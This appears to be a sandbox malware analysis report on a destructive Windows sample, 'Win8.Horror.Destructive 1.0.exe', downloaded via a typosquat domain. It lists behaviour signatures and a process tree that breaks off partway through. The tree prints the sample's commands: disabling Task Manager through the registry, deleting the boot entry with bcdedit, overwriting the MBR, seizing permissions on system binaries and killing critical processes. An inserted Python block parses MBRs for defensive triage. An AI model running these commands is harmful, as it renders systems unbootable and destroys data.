Analysis

  • max time kernel
    279s
  • max time network
    281s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20241007-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    08-11-2024 15:56

Errors

Reason
Machine shutdown

General

  • Target

    http://goole.com

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Possible privilege escalation attempt 9 IoCs
  • A potential corporate email address has been identified in the URL: currency-file@1
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 30 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
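
The "Writes to the Master Boot Record (MBR)" signature is the one that explains the "Machine shutdown" error above: once sector 0 is overwritten and the {current} BCD entry deleted, the guest cannot come back up. When triaging a disk image from a host that ran a sample like this, the first check is whether sector 0 still parses. The following Python is an added example, not part of this report or of the sample itself: it decodes the classic 512-byte MBR layout (446-byte bootstrap area, four 16-byte partition entries, 0x55AA signature), reports what a wiper leaves behind, and diffs against a known-good copy so that a bootkit-style replacement of only the bootstrap code is also visible. The sample sectors are constructed inline and are not taken from this analysis.

```python
import struct

SECTOR_SIZE = 512
PT_OFFSET = 446            # partition table starts after the bootstrap code area
ENTRY_SIZE = 16
SIG_OFFSET = 510
BOOT_SIGNATURE = b"\x55\xaa"

# Partition type IDs worth naming on a Windows disk; anything else is reported by number.
PARTITION_TYPES = {
    0x07: "NTFS/exFAT",
    0x0C: "FAT32 (LBA)",
    0x0F: "Extended (LBA)",
    0x27: "Windows RE",
    0xEE: "GPT protective MBR",
}


def parse_partition_entry(raw):
    """Decode one 16-byte MBR partition entry (little-endian layout)."""
    status, _chs_first, ptype, _chs_last, lba_first, sectors = struct.unpack("<B3sB3sII", raw)
    return {
        "bootable": status == 0x80,
        "type": ptype,
        "type_name": PARTITION_TYPES.get(ptype, "unknown (0x%02x)" % ptype),
        "lba_first": lba_first,
        "sectors": sectors,
    }


def parse_mbr(sector):
    """Split sector 0 into bootstrap code, populated partition entries and the boot signature."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly %d bytes" % SECTOR_SIZE)
    entries = [
        parse_partition_entry(sector[PT_OFFSET + i * ENTRY_SIZE: PT_OFFSET + (i + 1) * ENTRY_SIZE])
        for i in range(4)
    ]
    return {
        "bootstrap": sector[:PT_OFFSET],
        "partitions": [e for e in entries if e["type"] != 0],
        "signature_ok": sector[SIG_OFFSET:] == BOOT_SIGNATURE,
    }


def assess_mbr(sector):
    """Findings that indicate the MBR was wiped or otherwise will not boot."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing; BIOS/CSM firmware will not boot this disk")
    if not info["partitions"]:
        findings.append("partition table is empty")
    elif not any(p["bootable"] for p in info["partitions"]):
        findings.append("no partition carries the bootable flag")
    if len(set(info["bootstrap"])) <= 1:
        findings.append("bootstrap code area is uniform filler (zeroed or overwritten)")
    return findings


def diff_mbr(reference, current):
    """Which regions differ from a known-good copy: a bootkit typically changes only the
    bootstrap code, a wiper like the one in this report destroys all three."""
    regions = {
        "bootstrap": (0, PT_OFFSET),
        "partition_table": (PT_OFFSET, SIG_OFFSET),
        "signature": (SIG_OFFSET, SECTOR_SIZE),
    }
    return [name for name, (lo, hi) in regions.items() if reference[lo:hi] != current[lo:hi]]


def build_sample_mbr():
    """Constructed healthy MBR for the demonstration: pseudo bootstrap bytes (not real boot
    code) and a single bootable NTFS partition starting at LBA 2048."""
    bootstrap = bytes((i * 37 + 11) & 0xFF for i in range(PT_OFFSET))
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x21\x00", 0x07, b"\xfe\xff\xff", 2048, 0x00100000)
    table = entry + b"\x00" * (3 * ENTRY_SIZE)
    return bootstrap + table + BOOT_SIGNATURE


if __name__ == "__main__":
    healthy = build_sample_mbr()
    wiped = b"\x00" * SECTOR_SIZE   # constructed: what a zero-fill of sector 0 leaves behind
    for label, sector in (("healthy", healthy), ("wiped", wiped)):
        parts = [(p["type_name"], p["lba_first"]) for p in parse_mbr(sector)["partitions"]]
        print(label, "partitions:", parts)
        print(label, "findings:", assess_mbr(sector) or "none")
    print("regions changed:", diff_mbr(healthy, wiped))
```

To run it against evidence, read the first 512 bytes of a raw disk image (or, with administrative rights on a live Windows host, of \\.\PhysicalDrive0) and pass them to assess_mbr and diff_mbr. Two caveats: a structurally valid sector can still be hostile, which is why the diff against a trusted copy is the stronger check; and on a UEFI/GPT disk sector 0 only holds a protective MBR (type 0xEE), so damage to the real partition layout would be in the GPT header at LBA 1, which this parser does not cover.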

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://goole.com
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc13cbcc40,0x7ffc13cbcc4c,0x7ffc13cbcc58
      2⤵
        PID:1844
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1576,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1868 /prefetch:2
        2⤵
          PID:1480
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2112,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:3
          2⤵
            PID:4448
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2440 /prefetch:8
            2⤵
              PID:3580
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3044,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3060 /prefetch:1
              2⤵
                PID:1440
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3048,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3092 /prefetch:1
                2⤵
                  PID:968
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:1
                  2⤵
                    PID:1376
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4516,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4612 /prefetch:1
                    2⤵
                      PID:4536
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4788,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4816 /prefetch:1
                      2⤵
                        PID:3048
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5316,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4312 /prefetch:8
                        2⤵
                          PID:2876
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5184,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4312 /prefetch:1
                          2⤵
                            PID:4864
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4656,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:1
                            2⤵
                              PID:3080
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5424,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4872 /prefetch:1
                              2⤵
                                PID:4312
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4820,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5544 /prefetch:1
                                2⤵
                                  PID:3300
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5728,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5720 /prefetch:1
                                  2⤵
                                    PID:4208
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5868,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5936 /prefetch:1
                                    2⤵
                                      PID:3680
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6100,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6088 /prefetch:8
                                      2⤵
                                        PID:4720
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6212,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6204 /prefetch:8
                                        2⤵
                                          PID:5060
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5456,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4940 /prefetch:1
                                          2⤵
                                            PID:348
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5804,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5824 /prefetch:1
                                            2⤵
                                              PID:5068
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5872,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5176 /prefetch:1
                                              2⤵
                                                PID:4004
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5900,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:8
                                                2⤵
                                                  PID:2144
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5540,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3000 /prefetch:8
                                                  2⤵
                                                    PID:5060
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5776,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4732 /prefetch:1
                                                    2⤵
                                                      PID:4320
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=3340,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5928 /prefetch:1
                                                      2⤵
                                                        PID:2368
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5096,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3856 /prefetch:8
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5072
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4748,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4736 /prefetch:8
                                                        2⤵
                                                          PID:3428
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4672,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6064 /prefetch:8
                                                          2⤵
                                                            PID:4560
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6164,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:8
                                                            2⤵
                                                              PID:1720
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5808,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4576 /prefetch:8
                                                              2⤵
                                                                PID:4012
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5364,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
                                                                2⤵
                                                                  PID:2804
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4724,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4468 /prefetch:8
                                                                  2⤵
                                                                    PID:324
                                                                  • C:\Users\Admin\Downloads\Win8.Horror.Destructive 1.0.exe
                                                                    "C:\Users\Admin\Downloads\Win8.Horror.Destructive 1.0.exe"
                                                                    2⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:2844
                                                                    • C:\Windows\system32\wscript.exe
                                                                      "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\ED60.tmp\ED61.vbs //Nologo
                                                                      3⤵
                                                                      • Checks computer location settings
                                                                      PID:5072
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\Horror8.bat" "
                                                                        4⤵
                                                                        • Checks computer location settings
                                                                        • Modifies registry class
                                                                        PID:2900
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                          5⤵
                                                                          • Modifies registry key
                                                                          PID:3328
                                                                        • C:\Windows\system32\bcdedit.exe
                                                                          bcdedit /delete {current}
                                                                          5⤵
                                                                          • Modifies boot configuration data using bcdedit
                                                                          PID:3148
                                                                        • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\TrashMBR.exe
                                                                          TrashMBR.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Writes to the Master Boot Record (MBR)
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2320
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /f /im taskmgr.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:208
                                                                        • C:\Windows\system32\takeown.exe
                                                                          takeown /f C:\Windows\system32\taskmgr.exe
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:2756
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\system32\taskmgr.exe /grant Admin:F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:1840
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\system32\taskmgr.exe /grant "everyone":F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:4000
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /f /im logonui.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:4456
                                                                        • C:\Windows\system32\takeown.exe
                                                                          takeown /f C:\Windows\system32\logonui.exe
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:4300
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\system32\logonui.exe /grant Admin:F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:2980
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\system32\logonui.exe /grant "everyone":F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:3736
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /f /im explorer.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:184
                                                                        • C:\Windows\system32\takeown.exe
                                                                          takeown /f C:\Windows\explorer.exe
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:3632
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\explorer.exe /grant Admin:F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:4140
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\explorer.exe /grant "everyone":F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:4872
                                                                        • C:\Windows\System32\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\music.vbs"
                                                                          5⤵
                                                                          • Enumerates connected drives
                                                                          PID:1888
                                                                        • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\HorrorGui.exe
                                                                          HorrorGui.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:4124
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4496
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4388
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2460
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:1940
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2708
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2276
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3736
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2184
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4172
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2984
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3672
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2612
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:1748
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3156
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3412
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:1848
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3704
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3656
                                                                          • C:\Windows\SysWOW64\taskkill.exe
